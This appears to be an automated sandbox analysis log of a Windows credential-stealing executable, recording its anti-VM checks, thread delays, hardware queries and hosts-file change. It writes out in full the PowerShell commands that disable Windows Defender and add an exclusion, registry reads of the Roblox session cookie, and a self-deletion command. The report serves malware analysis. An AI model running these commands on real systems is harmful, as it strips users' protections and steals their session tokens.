                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeWindow / User API: threadDelayed 5820Jump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeWindow / User API: threadDelayed 4034Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5693Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4114Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2259Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 994Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3882Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1978Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4458Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1928Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3365
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 363
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exe TID: 7028Thread sleep time: -27670116110564310s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exe TID: 7028Thread sleep time: -597422s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exe TID: 7028Thread sleep time: -597286s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exe TID: 7028Thread sleep time: -597171s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exe TID: 7028Thread sleep time: -597062s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exe TID: 7028Thread sleep time: -596948s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exe TID: 7028Thread sleep time: -596841s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exe TID: 7028Thread sleep time: -596706s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exe TID: 7028Thread sleep time: -596567s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exe TID: 7028Thread sleep time: -596453s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exe TID: 7028Thread sleep time: -596343s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exe TID: 7028Thread sleep time: -596234s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exe TID: 7028Thread sleep time: -596124s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exe TID: 7028Thread sleep time: -596015s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exe TID: 7028Thread sleep time: -595906s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exe TID: 7028Thread sleep time: -595792s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exe TID: 7028Thread sleep time: -595687s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exe TID: 7028Thread sleep time: -595578s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exe TID: 7028Thread sleep time: -595468s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exe TID: 7028Thread sleep time: -595359s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exe TID: 7028Thread sleep time: -595250s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exe TID: 7028Thread sleep time: -595140s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exe TID: 7028Thread sleep time: -595031s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exe TID: 7028Thread sleep time: -594921s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exe TID: 7028Thread sleep time: -594812s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exe TID: 7028Thread sleep time: -594703s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exe TID: 7028Thread sleep time: -594593s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exe TID: 7028Thread sleep time: -594482s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exe TID: 7028Thread sleep time: -594375s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exe TID: 7028Thread sleep time: -594265s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exe TID: 7028Thread sleep time: -594156s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exe TID: 7028Thread sleep time: -594046s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exe TID: 7028Thread sleep time: -593932s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exe TID: 7028Thread sleep time: -593828s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exe TID: 7028Thread sleep time: -593718s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exe TID: 7028Thread sleep time: -593605s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exe TID: 7028Thread sleep time: -593491s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exe TID: 7028Thread sleep time: -593390s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exe TID: 7028Thread sleep time: -593281s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exe TID: 7028Thread sleep time: -593171s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exe TID: 7028Thread sleep time: -593062s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exe TID: 7028Thread sleep time: -592953s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exe TID: 7028Thread sleep time: -592843s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exe TID: 7028Thread sleep time: -592734s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exe TID: 7028Thread sleep time: -592624s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exe TID: 7028Thread sleep time: -592515s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exe TID: 7028Thread sleep time: -592406s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exe TID: 7028Thread sleep time: -592296s >= -30000sJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7516Thread sleep count: 5693 > 30Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7516Thread sleep count: 4114 > 30Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7552Thread sleep time: -7378697629483816s >= -30000sJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7784Thread sleep count: 2259 > 30Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7780Thread sleep count: 994 > 30Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7752Thread sleep time: -922337203685477s >= -30000sJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7896Thread sleep count: 3882 > 30Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7892Thread sleep count: 1978 > 30Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7932Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7868Thread sleep time: -922337203685477s >= -30000sJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8120Thread sleep count: 4458 > 30Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8124Thread sleep count: 1928 > 30Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8148Thread sleep time: -2767011611056431s >= -30000sJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8092Thread sleep time: -922337203685477s >= -30000sJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7504Thread sleep count: 3365 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7456Thread sleep count: 363 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7668Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7520Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct
                        Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT TotalPhysicalMemory FROM Win32_ComputerSystem
                        Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeThread delayed: delay time: 597422Jump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeThread delayed: delay time: 597286Jump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeThread delayed: delay time: 597171Jump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeThread delayed: delay time: 597062Jump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeThread delayed: delay time: 596948Jump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeThread delayed: delay time: 596841Jump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeThread delayed: delay time: 596706Jump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeThread delayed: delay time: 596567Jump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeThread delayed: delay time: 596453Jump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeThread delayed: delay time: 596343Jump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeThread delayed: delay time: 596234Jump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeThread delayed: delay time: 596124Jump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeThread delayed: delay time: 596015Jump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeThread delayed: delay time: 595906Jump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeThread delayed: delay time: 595792Jump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeThread delayed: delay time: 595687Jump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeThread delayed: delay time: 595578Jump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeThread delayed: delay time: 595468Jump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeThread delayed: delay time: 595359Jump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeThread delayed: delay time: 595250Jump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeThread delayed: delay time: 595140Jump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeThread delayed: delay time: 595031Jump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeThread delayed: delay time: 594921Jump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeThread delayed: delay time: 594812Jump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeThread delayed: delay time: 594703Jump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeThread delayed: delay time: 594593Jump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeThread delayed: delay time: 594482Jump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeThread delayed: delay time: 594375Jump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeThread delayed: delay time: 594265Jump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeThread delayed: delay time: 594156Jump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeThread delayed: delay time: 594046Jump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeThread delayed: delay time: 593932Jump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeThread delayed: delay time: 593828Jump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeThread delayed: delay time: 593718Jump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeThread delayed: delay time: 593605Jump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeThread delayed: delay time: 593491Jump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeThread delayed: delay time: 593390Jump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeThread delayed: delay time: 593281Jump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeThread delayed: delay time: 593171Jump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeThread delayed: delay time: 593062Jump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeThread delayed: delay time: 592953Jump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeThread delayed: delay time: 592843Jump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeThread delayed: delay time: 592734Jump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeThread delayed: delay time: 592624Jump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeThread delayed: delay time: 592515Jump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeThread delayed: delay time: 592406Jump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeThread delayed: delay time: 592296Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: IDLBk4XMUa.exe, NcIxl.scr.0.drBinary or memory string: vboxtray
                        Source: NcIxl.scr.0.drBinary or memory string: vboxservice
                        Source: IDLBk4XMUa.exe, NcIxl.scr.0.drBinary or memory string: qemu-ga
                        Source: NcIxl.scr.0.drBinary or memory string: vmwareuser
                        Source: IDLBk4XMUa.exe, NcIxl.scr.0.drBinary or memory string: vmusrvc
                        Source: NcIxl.scr.0.drBinary or memory string: vmwareservice+discordtokenprotector
                        Source: NcIxl.scr.0.drBinary or memory string: vmsrvc
                        Source: NcIxl.scr.0.drBinary or memory string: vmtoolsd
                        Source: NcIxl.scr.0.drBinary or memory string: vmwaretray
                        Source: IDLBk4XMUa.exe, 00000000.00000002.1853846152.0000020097FD4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmwareservice
                        Source: IDLBk4XMUa.exe, 00000000.00000002.1848224198.00000200964D7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll~~
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeProcess information queried: ProcessInformationJump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeMemory allocated: page read and write | page guardJump to behavior

                        HIPS / PFW / Operating System Protection Evasion

                        barindex
                        Adds a directory exclusion to Windows Defender
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\IDLBk4XMUa.exe'
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\IDLBk4XMUa.exe'Jump to behavior
                        Modifies Windows Defender protection settings
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2Jump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2Jump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2Jump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2Jump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2Jump to behavior
                        Modifies the hosts file
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeProcess created: C:\Windows\System32\wbem\WMIC.exe "wmic.exe" csproduct get uuidJump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeProcess created: C:\Windows\System32\attrib.exe "attrib.exe" +h +s "C:\Users\user\Desktop\IDLBk4XMUa.exe"Jump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\IDLBk4XMUa.exe'Jump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2Jump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITYJump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITYJump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeProcess created: C:\Windows\System32\wbem\WMIC.exe "wmic.exe" os get CaptionJump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeProcess created: C:\Windows\System32\wbem\WMIC.exe "wmic.exe" computersystem get totalphysicalmemoryJump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeProcess created: C:\Windows\System32\wbem\WMIC.exe "wmic.exe" csproduct get uuidJump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIERJump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeProcess created: C:\Windows\System32\wbem\WMIC.exe "wmic" path win32_VideoController get nameJump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c ping localhost && del /F /A h "C:\Users\user\Desktop\IDLBk4XMUa.exe" && pauseJump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping localhost
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend && powershell set-mppreference -submitsamplesconsent 2
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend && powershell set-mppreference -submitsamplesconsent 2Jump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeQueries volume information: C:\Users\user\Desktop\IDLBk4XMUa.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\IDLBk4XMUa.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
